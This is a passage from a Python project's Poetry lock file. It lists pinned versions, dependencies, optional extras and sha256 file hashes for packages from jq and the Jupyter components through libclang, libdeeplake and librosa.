"sha256:5184c2fcca40f8f2ab1b14662721accf68b4b5e772e2f5336fec24aa58fe235a"}, {file = "jq-1.6.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:689429fe1e07a2d6041daba2c21ced3a24895b2745326deb0c90ccab9386e116"}, {file = "jq-1.6.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8405d1c996c83711570f16aac32e3bf2c116d6fa4254a820276b87aed544d7e8"}, {file = "jq-1.6.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:138d56c7efc8bb162c1cfc3806bd6b4d779115943af36c9e3b8ca644dde856c2"}, {file = "jq-1.6.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fd28f8395687e45bba56dc771284ebb6492b02037f74f450176c102f3f4e86a3"}, {file = "jq-1.6.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b2c783288bf10e67aad321b58735e663f4975d7ddfbfb0a5bca8428eee283bde"}, {file = "jq-1.6.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:206391ac5b2eb556720b94f0f131558cbf8d82d8cc7e0404e733eeef48bcd823"}, {file = "jq-1.6.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:35090fea1283402abc3a13b43261468162199d8b5dcdaba2d1029e557ed23070"}, {file = "jq-1.6.0-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:201c6384603aec87a744ad7b393cc4f1c58ece23d6e0a6c216a47bfcc405d231"}, {file = "jq-1.6.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a3d8b075351c29653f29a1fec5d31bc88aa198a0843c0a9550b9be74d8fab33b"}, {file = "jq-1.6.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:132e41f6e988c42b91c04b1b60dd8fa185a5c0681de5438ea1e6c64f5329768c"}, {file = "jq-1.6.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e1cb4751808b1d0dbddd37319e0c574fb0c3a29910d52ba35890b1343a1f1e59"}, {file = "jq-1.6.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = 
"sha256:bd158911ed5f5c644f557ad94d6424c411560632a885eae47d105f290f0109cb"}, {file = "jq-1.6.0-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:64bc09ae6a9d9b82b78e15d142f90b816228bd3ee48833ddca3ff8c08e163fa7"}, {file = "jq-1.6.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f4eed167322662f4b7e65235723c54aa6879f6175b6f9b68bc24887549637ffb"}, {file = "jq-1.6.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:64bb4b305e2fabe5b5161b599bf934aceb0e0e7d3dd8f79246737ea91a2bc9ae"}, {file = "jq-1.6.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:165bfbe29bf73878d073edf75f384b7da8a9657ba0ab9fb1e5fe6be65ab7debb"}, {file = "jq-1.6.0.tar.gz", hash = "sha256:c7711f0c913a826a00990736efa6ffc285f8ef433414516bb14b7df971d6c1ea"}, ] [[package]] name = "json5" version = "0.9.14" description = "A Python implementation of the JSON5 data format." optional = false python-versions = "*" files = [ {file = "json5-0.9.14-py2.py3-none-any.whl", hash = "sha256:740c7f1b9e584a468dbb2939d8d458db3427f2c93ae2139d05f47e453eae964f"}, {file = "json5-0.9.14.tar.gz", hash = "sha256:9ed66c3a6ca3510a976a9ef9b8c0787de24802724ab1860bc0153c7fdd589b02"}, ] [package.extras] dev = ["hypothesis"] [[package]] name = "jsonable" version = "0.3.1" description = "An abstract class that supports jsonserialization/deserialization." optional = true python-versions = "*" files = [ {file = "jsonable-0.3.1-py2.py3-none-any.whl", hash = "sha256:f7754dd27b4734e42e7f8a61c2336bc98082f715e31e29a061a95843b102dc3a"}, {file = "jsonable-0.3.1.tar.gz", hash = "sha256:137b676e8e5819fa58518678c3d1f5463cab7e8466f69b3641cbc438042eaee4"}, ] [[package]] name = "jsonlines" version = "4.0.0" description = "Library with helpers for the jsonlines file format" optional = true python-versions = ">=3.8" files = [ {file = "jsonlines-4.0.0-py3-none-any.whl", hash = "sha256:185b334ff2ca5a91362993f42e83588a360cf95ce4b71a73548502bda52a7c55"}, {file = "jsonlines-4.0.0.tar.gz", hash = "sha256:0c6d2c09117550c089995247f605ae4cf77dd1533041d366351f6f298822ea74"}, ] [package.dependencies] attrs = ">=19.2.0" [[package]] name = "jsonpatch" version = "1.33" description = "Apply JSON-Patches (RFC 6902)" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, !=3.6.*" files = [ {file = "jsonpatch-1.33-py2.py3-none-any.whl", hash = "sha256:0ae28c0cd062bbd8b8ecc26d7d164fbbea9652a1a3693f3b956c1eae5145dade"}, {file = "jsonpatch-1.33.tar.gz", hash = "sha256:9fcd4009c41e6d12348b4a0ff2563ba56a2923a7dfee731d004e212e1ee5030c"}, ] [package.dependencies] jsonpointer = ">=1.9" [[package]] name = "jsonpointer" version = "2.4" description = "Identify specific nodes in a JSON document (RFC 6901)" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, !=3.6.*" files = [ {file = "jsonpointer-2.4-py2.py3-none-any.whl", hash = "sha256:15d51bba20eea3165644553647711d150376234112651b4f1811022aecad7d7a"}, {file = "jsonpointer-2.4.tar.gz", hash = "sha256:585cee82b70211fa9e6043b7bb89db6e1aa49524340dde8ad6b63206ea689d88"}, ] [[package]] name = "jsonschema" version = "4.19.1" description = "An implementation of JSON Schema validation for Python" optional = false python-versions = ">=3.8" files = [ {file = "jsonschema-4.19.1-py3-none-any.whl", hash = "sha256:cd5f1f9ed9444e554b38ba003af06c0a8c2868131e56bfbef0550fb450c0330e"}, {file = "jsonschema-4.19.1.tar.gz", hash = 
"sha256:ec84cc37cfa703ef7cd4928db24f9cb31428a5d0fa77747b8b51a847458e0bbf"}, ] [package.dependencies] attrs = ">=22.2.0" fqdn = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} idna = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} importlib-resources = {version = ">=1.4.0", markers = "python_version < \"3.9\""} isoduration = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} jsonpointer = {version = ">1.13", optional = true, markers = "extra == \"format-nongpl\""} jsonschema-specifications = ">=2023.03.6" pkgutil-resolve-name = {version = ">=1.3.10", markers = "python_version < \"3.9\""} referencing = ">=0.28.4" rfc3339-validator = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} rfc3986-validator = {version = ">0.1.0", optional = true, markers = "extra == \"format-nongpl\""} rpds-py = ">=0.7.1" uri-template = {version = "*", optional = true, markers = "extra == \"format-nongpl\""} webcolors = {version = ">=1.11", optional = true, markers = "extra == \"format-nongpl\""} [package.extras] format = ["fqdn", "idna", "isoduration", "jsonpointer (>1.13)", "rfc3339-validator", "rfc3987", "uri-template", "webcolors (>=1.11)"] format-nongpl = ["fqdn", "idna", "isoduration", "jsonpointer (>1.13)", "rfc3339-validator", "rfc3986-validator (>0.1.0)", "uri-template", "webcolors (>=1.11)"] [[package]] name = "jsonschema-specifications" version = "2023.7.1" description = "The JSON Schema meta-schemas and vocabularies, exposed as a Registry" optional = false python-versions = ">=3.8" files = [ {file = "jsonschema_specifications-2023.7.1-py3-none-any.whl", hash = "sha256:05adf340b659828a004220a9613be00fa3f223f2b82002e273dee62fd50524b1"}, {file = "jsonschema_specifications-2023.7.1.tar.gz", hash = "sha256:c91a50404e88a1f6ba40636778e2ee08f6e24c5613fe4c53ac24578a5a7f72bb"}, ] [package.dependencies] importlib-resources = {version = ">=1.4.0", markers = "python_version < \"3.9\""} referencing = ">=0.28.0" [[package]] name = "jupyter" version = "1.0.0" description = "Jupyter metapackage. Install all the Jupyter components in one go." 
optional = false python-versions = "*" files = [ {file = "jupyter-1.0.0-py2.py3-none-any.whl", hash = "sha256:5b290f93b98ffbc21c0c7e749f054b3267782166d72fa5e3ed1ed4eaf34a2b78"}, {file = "jupyter-1.0.0.tar.gz", hash = "sha256:d9dc4b3318f310e34c82951ea5d6683f67bed7def4b259fafbfe4f1beb1d8e5f"}, {file = "jupyter-1.0.0.zip", hash = "sha256:3e1f86076bbb7c8c207829390305a2b1fe836d471ed54be66a3b8c41e7f46cc7"}, ] [package.dependencies] ipykernel = "*" ipywidgets = "*" jupyter-console = "*" nbconvert = "*" notebook = "*" qtconsole = "*" [[package]] name = "jupyter-client" version = "8.5.0" description = "Jupyter protocol implementation and client libraries" optional = false python-versions = ">=3.8" files = [ {file = "jupyter_client-8.5.0-py3-none-any.whl", hash = "sha256:c3877aac7257ec68d79b5c622ce986bd2a992ca42f6ddc9b4dd1da50e89f7028"}, {file = "jupyter_client-8.5.0.tar.gz", hash = "sha256:e8754066510ce456358df363f97eae64b50860f30dc1fe8c6771440db3be9a63"}, ] [package.dependencies] importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""} jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" python-dateutil = ">=2.8.2" pyzmq = ">=23.0" tornado = ">=6.2" traitlets = ">=5.3" [package.extras] docs = ["ipykernel", "myst-parser", "pydata-sphinx-theme", "sphinx (>=4)", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-spelling"] test = ["coverage", "ipykernel (>=6.14)", "mypy", "paramiko", "pre-commit", "pytest", "pytest-cov", "pytest-jupyter[client] (>=0.4.1)", "pytest-timeout"] [[package]] name = "jupyter-console" version = "6.6.3" description = "Jupyter terminal console" optional = false python-versions = ">=3.7" files = [ {file = "jupyter_console-6.6.3-py3-none-any.whl", hash = "sha256:309d33409fcc92ffdad25f0bcdf9a4a9daa61b6f341177570fdac03de5352485"}, {file = "jupyter_console-6.6.3.tar.gz", hash = "sha256:566a4bf31c87adbfadf22cdf846e3069b59a71ed5da71d6ba4d8aaad14a53539"}, ] [package.dependencies] ipykernel = ">=6.14" ipython = "*" jupyter-client = ">=7.0.0" jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" prompt-toolkit = ">=3.0.30" pygments = "*" pyzmq = ">=17" traitlets = ">=5.4" [package.extras] test = ["flaky", "pexpect", "pytest"] [[package]] name = "jupyter-core" version = "5.4.0" description = "Jupyter core package. A base package on which Jupyter projects rely." 
optional = false python-versions = ">=3.8" files = [ {file = "jupyter_core-5.4.0-py3-none-any.whl", hash = "sha256:66e252f675ac04dcf2feb6ed4afb3cd7f68cf92f483607522dc251f32d471571"}, {file = "jupyter_core-5.4.0.tar.gz", hash = "sha256:e4b98344bb94ee2e3e6c4519a97d001656009f9cb2b7f2baf15b3c205770011d"}, ] [package.dependencies] platformdirs = ">=2.5" pywin32 = {version = ">=300", markers = "sys_platform == \"win32\" and platform_python_implementation != \"PyPy\""} traitlets = ">=5.3" [package.extras] docs = ["myst-parser", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-spelling", "traitlets"] test = ["ipykernel", "pre-commit", "pytest", "pytest-cov", "pytest-timeout"] [[package]] name = "jupyter-events" version = "0.8.0" description = "Jupyter Event System library" optional = false python-versions = ">=3.8" files = [ {file = "jupyter_events-0.8.0-py3-none-any.whl", hash = "sha256:81f07375c7673ff298bfb9302b4a981864ec64edaed75ca0fe6f850b9b045525"}, {file = "jupyter_events-0.8.0.tar.gz", hash = "sha256:fda08f0defce5e16930542ce60634ba48e010830d50073c3dfd235759cee77bf"}, ] [package.dependencies] jsonschema = {version = ">=4.18.0", extras = ["format-nongpl"]} python-json-logger = ">=2.0.4" pyyaml = ">=5.3" referencing = "*" rfc3339-validator = "*" rfc3986-validator = ">=0.1.1" traitlets = ">=5.3" [package.extras] cli = ["click", "rich"] docs = ["jupyterlite-sphinx", "myst-parser", "pydata-sphinx-theme", "sphinxcontrib-spelling"] test = ["click", "pre-commit", "pytest (>=7.0)", "pytest-asyncio (>=0.19.0)", "pytest-console-scripts", "rich"] [[package]] name = "jupyter-lsp" version = "2.2.0" description = "Multi-Language Server WebSocket proxy for Jupyter Notebook/Lab server" optional = false python-versions = ">=3.8" files = [ {file = "jupyter-lsp-2.2.0.tar.gz", hash = "sha256:8ebbcb533adb41e5d635eb8fe82956b0aafbf0fd443b6c4bfa906edeeb8635a1"}, {file = "jupyter_lsp-2.2.0-py3-none-any.whl", hash = "sha256:9e06b8b4f7dd50300b70dd1a78c0c3b0c3d8fa68e0f2d8a5d1fbab62072aca3f"}, ] [package.dependencies] importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""} jupyter-server = ">=1.1.2" [[package]] name = "jupyter-server" version = "2.9.1" description = "The backend—i.e. core services, APIs, and REST endpoints—to Jupyter web applications." 
optional = false python-versions = ">=3.8" files = [ {file = "jupyter_server-2.9.1-py3-none-any.whl", hash = "sha256:21ad1a3d455d5a79ce4bef5201925cd17510c17898cf9d54e3ccfb6b12734948"}, {file = "jupyter_server-2.9.1.tar.gz", hash = "sha256:9ba71be4b9c16e479e4c50c929f8ac4b1015baf90237a08681397a98c76c7e5e"}, ] [package.dependencies] anyio = ">=3.1.0" argon2-cffi = "*" jinja2 = "*" jupyter-client = ">=7.4.4" jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" jupyter-events = ">=0.6.0" jupyter-server-terminals = "*" nbconvert = ">=6.4.4" nbformat = ">=5.3.0" overrides = "*" packaging = "*" prometheus-client = "*" pywinpty = {version = "*", markers = "os_name == \"nt\""} pyzmq = ">=24" send2trash = ">=1.8.2" terminado = ">=0.8.3" tornado = ">=6.2.0" traitlets = ">=5.6.0" websocket-client = "*" [package.extras] docs = ["ipykernel", "jinja2", "jupyter-client", "jupyter-server", "myst-parser", "nbformat", "prometheus-client", "pydata-sphinx-theme", "send2trash", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-openapi (>=0.8.0)", "sphinxcontrib-spelling", "sphinxemoji", "tornado", "typing-extensions"] test = ["flaky", "ipykernel", "pre-commit", "pytest (>=7.0)", "pytest-console-scripts", "pytest-jupyter[server] (>=0.4)", "pytest-timeout", "requests"] [[package]] name = "jupyter-server-terminals" version = "0.4.4" description = "A Jupyter Server Extension Providing Terminals." optional = false python-versions = ">=3.8" files = [ {file = "jupyter_server_terminals-0.4.4-py3-none-any.whl", hash = "sha256:75779164661cec02a8758a5311e18bb8eb70c4e86c6b699403100f1585a12a36"}, {file = "jupyter_server_terminals-0.4.4.tar.gz", hash = "sha256:57ab779797c25a7ba68e97bcfb5d7740f2b5e8a83b5e8102b10438041a7eac5d"}, ] [package.dependencies] pywinpty = {version = ">=2.0.3", markers = "os_name == \"nt\""} terminado = ">=0.8.3" [package.extras] docs = ["jinja2", "jupyter-server", "mistune (<3.0)", "myst-parser", "nbformat", "packaging", "pydata-sphinx-theme", "sphinxcontrib-github-alt", "sphinxcontrib-openapi", "sphinxcontrib-spelling", "sphinxemoji", "tornado"] test = ["coverage", "jupyter-server (>=2.0.0)", "pytest (>=7.0)", "pytest-cov", "pytest-jupyter[server] (>=0.5.3)", "pytest-timeout"] [[package]] name = "jupyterlab" version = "4.0.7" description = "JupyterLab computational environment" optional = false python-versions = ">=3.8" files = [ {file = "jupyterlab-4.0.7-py3-none-any.whl", hash = "sha256:08683045117cc495531fdb39c22ababb9aaac6977a45e67cfad20046564c9c7c"}, {file = "jupyterlab-4.0.7.tar.gz", hash = "sha256:48792efd9f962b2bcda1f87d72168ff122c288b1d97d32109e4a11b33dc862be"}, ] [package.dependencies] async-lru = ">=1.0.0" importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""} importlib-resources = {version = ">=1.4", markers = "python_version < \"3.9\""} ipykernel = "*" jinja2 = ">=3.0.3" jupyter-core = "*" jupyter-lsp = ">=2.0.0" jupyter-server = ">=2.4.0,<3" jupyterlab-server = ">=2.19.0,<3" notebook-shim = ">=0.2" packaging = "*" tomli = {version = "*", markers = "python_version < \"3.11\""} tornado = ">=6.2.0" traitlets = "*" [package.extras] dev = ["black[jupyter] (==23.7.0)", "build", "bump2version", "coverage", "hatch", "pre-commit", "pytest-cov", "ruff (==0.0.286)"] docs = ["jsx-lexer", "myst-parser", "pydata-sphinx-theme (>=0.13.0)", "pytest", "pytest-check-links", "pytest-tornasync", "sphinx (>=1.8,<7.2.0)", "sphinx-copybutton"] docs-screenshots = ["altair (==5.0.1)", "ipython (==8.14.0)", "ipywidgets (==8.0.6)", "jupyterlab-geojson (==3.4.0)", 
"jupyterlab-language-pack-zh-cn (==4.0.post0)", "matplotlib (==3.7.1)", "nbconvert (>=7.0.0)", "pandas (==2.0.2)", "scipy (==1.10.1)", "vega-datasets (==0.9.0)"] test = ["coverage", "pytest (>=7.0)", "pytest-check-links (>=0.7)", "pytest-console-scripts", "pytest-cov", "pytest-jupyter (>=0.5.3)", "pytest-timeout", "pytest-tornasync", "requests", "requests-cache", "virtualenv"] [[package]] name = "jupyterlab-pygments" version = "0.2.2" description = "Pygments theme using JupyterLab CSS variables" optional = false python-versions = ">=3.7" files = [ {file = "jupyterlab_pygments-0.2.2-py2.py3-none-any.whl", hash = "sha256:2405800db07c9f770863bcf8049a529c3dd4d3e28536638bd7c1c01d2748309f"}, {file = "jupyterlab_pygments-0.2.2.tar.gz", hash = "sha256:7405d7fde60819d905a9fa8ce89e4cd830e318cdad22a0030f7a901da705585d"}, ] [[package]] name = "jupyterlab-server" version = "2.25.0" description = "A set of server components for JupyterLab and JupyterLab like applications." optional = false python-versions = ">=3.8" files = [ {file = "jupyterlab_server-2.25.0-py3-none-any.whl", hash = "sha256:c9f67a98b295c5dee87f41551b0558374e45d449f3edca153dd722140630dcb2"}, {file = "jupyterlab_server-2.25.0.tar.gz", hash = "sha256:77c2f1f282d610f95e496e20d5bf1d2a7706826dfb7b18f3378ae2870d272fb7"}, ] [package.dependencies] babel = ">=2.10" importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""} jinja2 = ">=3.0.3" json5 = ">=0.9.0" jsonschema = ">=4.18.0" jupyter-server = ">=1.21,<3" packaging = ">=21.3" requests = ">=2.31" [package.extras] docs = ["autodoc-traits", "jinja2 (<3.2.0)", "mistune (<4)", "myst-parser", "pydata-sphinx-theme", "sphinx", "sphinx-copybutton", "sphinxcontrib-openapi (>0.8)"] openapi = ["openapi-core (>=0.18.0,<0.19.0)", "ruamel-yaml"] test = ["hatch", "ipykernel", "openapi-core (>=0.18.0,<0.19.0)", "openapi-spec-validator (>=0.6.0,<0.7.0)", "pytest (>=7.0)", "pytest-console-scripts", "pytest-cov", "pytest-jupyter[server] (>=0.6.2)", "pytest-timeout", "requests-mock", "ruamel-yaml", "sphinxcontrib-spelling", "strict-rfc3339", "werkzeug"] [[package]] name = "jupyterlab-widgets" version = "3.0.9" description = "Jupyter interactive widgets for JupyterLab" optional = false python-versions = ">=3.7" files = [ {file = "jupyterlab_widgets-3.0.9-py3-none-any.whl", hash = "sha256:3cf5bdf5b897bf3bccf1c11873aa4afd776d7430200f765e0686bd352487b58d"}, {file = "jupyterlab_widgets-3.0.9.tar.gz", hash = "sha256:6005a4e974c7beee84060fdfba341a3218495046de8ae3ec64888e5fe19fdb4c"}, ] [[package]] name = "keras" version = "2.11.0" description = "Deep learning for humans." 
optional = true python-versions = ">=3.7" files = [ {file = "keras-2.11.0-py2.py3-none-any.whl", hash = "sha256:38c6fff0ea9a8b06a2717736565c92a73c8cd9b1c239e7125ccb188b7848f65e"}, ] [[package]] name = "lancedb" version = "0.1.16" description = "lancedb" optional = true python-versions = ">=3.8" files = [ {file = "lancedb-0.1.16-py3-none-any.whl", hash = "sha256:ed5ff765c127fd8c8b193b448a127ae9de4afd458874e6d981edeafa09cf6a4a"}, {file = "lancedb-0.1.16.tar.gz", hash = "sha256:c22621635ca1b74f24983b8247886f93d23d7477fdbe5c67449a0939c19ef7bd"}, ] [package.dependencies] aiohttp = "*" attr = "*" pydantic = "*" pylance = "0.5.10" ratelimiter = "*" retry = "*" semver = "*" tqdm = "*" [package.extras] dev = ["black", "pre-commit", "ruff"] docs = ["mkdocs", "mkdocs-jupyter", "mkdocs-material", "mkdocstrings[python]"] tests = ["pandas (>=1.4)", "pytest", "pytest-asyncio", "pytest-mock"] [[package]] name = "langkit" version = "0.0.22" description = "A collection of text metric udfs for whylogs profiling and monitoring in WhyLabs" optional = true python-versions = ">=3.8,<4" files = [ {file = "langkit-0.0.22-py3-none-any.whl", hash = "sha256:9f0f0a5311648f08adbb250dcd49ad761b1e3ee0834d860b8660f931f8b7d771"}, {file = "langkit-0.0.22.tar.gz", hash = "sha256:7a94a8c24e1838da913f999a0ad699971cdf7c31c179e6a8e6ba69b0f6e8570f"}, ] [package.dependencies] pandas = "*" textstat = ">=0.7.3,<0.8.0" whylogs = ">=1.3.9,<2.0.0" xformers = {version = "*", markers = "python_full_version >= \"3.8.0\" and python_version < \"4\" and sys_platform == \"!macos\""} [package.extras] all = ["datasets (>=2.12.0,<3.0.0)", "evaluate (>=0.4.0,<0.5.0)", "faiss-cpu (>=1.7.1,<2.0.0)", "ipywidgets (>=8.1.1,<9.0.0)", "nltk (>=3.8.1,<4.0.0)", "numpy", "openai (>=0.27.6,<0.28.0)", "sentence-transformers (>=2.2.2,<3.0.0)", "torch"] [[package]] name = "langsmith" version = "0.0.53" description = "Client library to connect to the LangSmith LLM Tracing and Evaluation Platform." optional = false python-versions = ">=3.8.1,<4.0" files = [ {file = "langsmith-0.0.53-py3-none-any.whl", hash = "sha256:a090b1c7d7968fb8d2476ddd608a5171f0e812a82b1bca29ca136cdea375a74e"}, {file = "langsmith-0.0.53.tar.gz", hash = "sha256:a426a1d39843207a5dd3d72787b5304376541eb818509ee7909bbb696b072488"}, ] [package.dependencies] pydantic = ">=1,<3" requests = ">=2,<3" [[package]] name = "lark" version = "1.1.8" description = "a modern parsing library" optional = false python-versions = ">=3.6" files = [ {file = "lark-1.1.8-py3-none-any.whl", hash = "sha256:7d2c221a66a8165f3f81aacb958d26033d40d972fdb70213ab0a2e0627e29c86"}, {file = "lark-1.1.8.tar.gz", hash = "sha256:7ef424db57f59c1ffd6f0d4c2b705119927f566b68c0fe1942dddcc0e44391a5"}, ] [package.extras] atomic-cache = ["atomicwrites"] interegular = ["interegular (>=0.3.1,<0.4.0)"] nearley = ["js2py"] regex = ["regex"] [[package]] name = "lazy-loader" version = "0.3" description = "lazy_loader" optional = true python-versions = ">=3.7" files = [ {file = "lazy_loader-0.3-py3-none-any.whl", hash = "sha256:1e9e76ee8631e264c62ce10006718e80b2cfc74340d17d1031e0f84af7478554"}, {file = "lazy_loader-0.3.tar.gz", hash = "sha256:3b68898e34f5b2a29daaaac172c6555512d0f32074f147e2254e4a6d9d838f37"}, ] [package.extras] lint = ["pre-commit (>=3.3)"] test = ["pytest (>=7.4)", "pytest-cov (>=4.1)"] [[package]] name = "libclang" version = "16.0.6" description = "Clang Python Bindings, mirrored from the official LLVM repo: https://github.com/llvm/llvm-project/tree/main/clang/bindings/python, to make the installation process easier." 
optional = true python-versions = "*" files = [ {file = "libclang-16.0.6-1-py2.py3-none-manylinux2014_aarch64.whl", hash = "sha256:88bc7e7b393c32e41e03ba77ef02fdd647da1f764c2cd028e69e0837080b79f6"}, {file = "libclang-16.0.6-1-py2.py3-none-manylinux2014_armv7l.whl", hash = "sha256:d80ed5827736ed5ec2bcedf536720476fd9d4fa4c79ef0cb24aea4c59332f361"}, {file = "libclang-16.0.6-py2.py3-none-macosx_10_9_x86_64.whl", hash = "sha256:da9e47ebc3f0a6d90fb169ef25f9fbcd29b4a4ef97a8b0e3e3a17800af1423f4"}, {file = "libclang-16.0.6-py2.py3-none-macosx_11_0_arm64.whl", hash = "sha256:e1a5ad1e895e5443e205568c85c04b4608e4e973dae42f4dfd9cb46c81d1486b"}, {file = "libclang-16.0.6-py2.py3-none-manylinux2010_x86_64.whl", hash = "sha256:9dcdc730939788b8b69ffd6d5d75fe5366e3ee007f1e36a99799ec0b0c001492"}, {file = "libclang-16.0.6-py2.py3-none-manylinux2014_aarch64.whl", hash = "sha256:8130482120500476a027171f8f3c8dfc2536b591716eea71fc5da22cae13131b"}, {file = "libclang-16.0.6-py2.py3-none-manylinux2014_armv7l.whl", hash = "sha256:1e940048f51d0b0999099a9b78629ab8a64b62af5e9ff1b2b062439c21ee244d"}, {file = "libclang-16.0.6-py2.py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:f04e3060ae1f207f234d0608900c99c50edcb743e5e18276d78da2ddd727d39f"}, {file = "libclang-16.0.6-py2.py3-none-win_amd64.whl", hash = "sha256:daab4a11dae228f1efa9efa3fe638b493b14d8d52c71fb3c7019e2f1df4514c2"}, {file = "libclang-16.0.6-py2.py3-none-win_arm64.whl", hash = "sha256:4a9acbfd9c135a72f80d5dbff7588dfb0c81458244a89b9e83526e8595880e0a"}, {file = "libclang-16.0.6.tar.gz", hash = "sha256:4acdde39dfe410c877b4ccc0d4b57eb952100e4ee26bbdf6cfdb88e2033a7d31"}, ] [[package]] name = "libdeeplake" version = "0.0.84" description = "C++ backend for Deep Lake" optional = true python-versions = "*" files = [ {file = "libdeeplake-0.0.84-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:b24e7d025ce29b0e1505c8b952f2e7eda454461fefc9bad61ddc804d1b081c80"}, {file = "libdeeplake-0.0.84-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:dc120ec1cb4fe3f49bfbf02e0a5e8e15129329083ab74f1d618cfe71867eeb61"}, {file = "libdeeplake-0.0.84-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:d94c419063d6e96c4defc5fcdce2a9e143a668bb9292105a2abb8040fbef519e"}, {file = "libdeeplake-0.0.84-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:65e6eab3b1920acef9fbfd5ecb11c4521c38e66bff0b3f02a0760c7d5722e242"}, {file = "libdeeplake-0.0.84-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:3a3a2acf2deef3a72bcde1856a025b13bd594267e84ada91bc79a8881606f29a"}, {file = "libdeeplake-0.0.84-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:69cea8d6d5e736a1a655c191d9192d47c93543f68fc08703a3660b327b2ea8af"}, {file = "libdeeplake-0.0.84-cp311-cp311-manylinux2014_aarch64.whl", hash = "sha256:d4be0dc25d01d07fb3e3cb61d8ff287520fa21f7eeb5190cb8ac38bc32e24a13"}, {file = "libdeeplake-0.0.84-cp311-cp311-manylinux2014_x86_64.whl", hash = "sha256:74798f43084827025e783cedee6e480699cf8c00b89730fc98d39fae8a48bba7"}, {file = "libdeeplake-0.0.84-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:6b9b489254ae2ed18a59eb3ebb9b0229dbd68dfbff695ed61a8b7707cbeae188"}, {file = "libdeeplake-0.0.84-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:f6dfd25181d80fedcb57f93a3e14ba15918b19e30e6758c8868ec452ec4c3d31"}, {file = "libdeeplake-0.0.84-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:bb2f2a0b9c292b342e33e87c9f08f8eed8bc4c0a1b2d16d44a48fc1553a77860"}, {file = "libdeeplake-0.0.84-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:c61696a92b0e07c2ecec5faebb5f78a3f1aae54b12bd84ca553a2d8b9dfdc539"}, 
{file = "libdeeplake-0.0.84-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:7983b44e2efb541ecaa0960abe2f15eabf1f2567ff2b6c6042b261c5b3399a65"}, {file = "libdeeplake-0.0.84-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:6cd70f8955dd63247cbc56cf7128d948184a0ebf080b46476142bc701a1fc090"}, {file = "libdeeplake-0.0.84-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:553a22bc3c887fdfa5a73a049f72594170e3e0098c0801f7112e64861f25faf2"}, {file = "libdeeplake-0.0.84-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f5b8bc4243c26132bfc87c5dec9c64d42bb9e330a0055a2d8c965daaa0b19927"}, {file = "libdeeplake-0.0.84-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:8bded8b6b3d9055bcb21ba34a2dc8384d84ba61042f8f030ab765f93709029ae"}, {file = "libdeeplake-0.0.84-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:301dab8e7894bc02431173a4d084271a1e451758f3e99b7029d48b5333c0d849"}, ] [package.dependencies] dill = "*" numpy = "*" [[package]] name = "librosa" version = "0.10.1" description = "Python module for audio and music processing" optional = true python-versions = ">=3.7" files = [ {file = "librosa-0.10.1-py3-none-any.whl", hash = "sha256:7ab91d9f5fcb75ea14848a05d3b1f825cf8d0c42ca160d19ae6874f2de2d8223"}, {file = "librosa-0.10.1.tar.gz", hash = "sha256:832f7d150d6dd08ed2aa08c0567a4be58330635c32ddd2208de9bc91300802c7"}, ] [package.dependencies] audioread = ">=2.1.9" decorator = ">=4.3.0" joblib = ">=0.14" lazy-loader = ">=0.1" msgpack = ">=1.0" 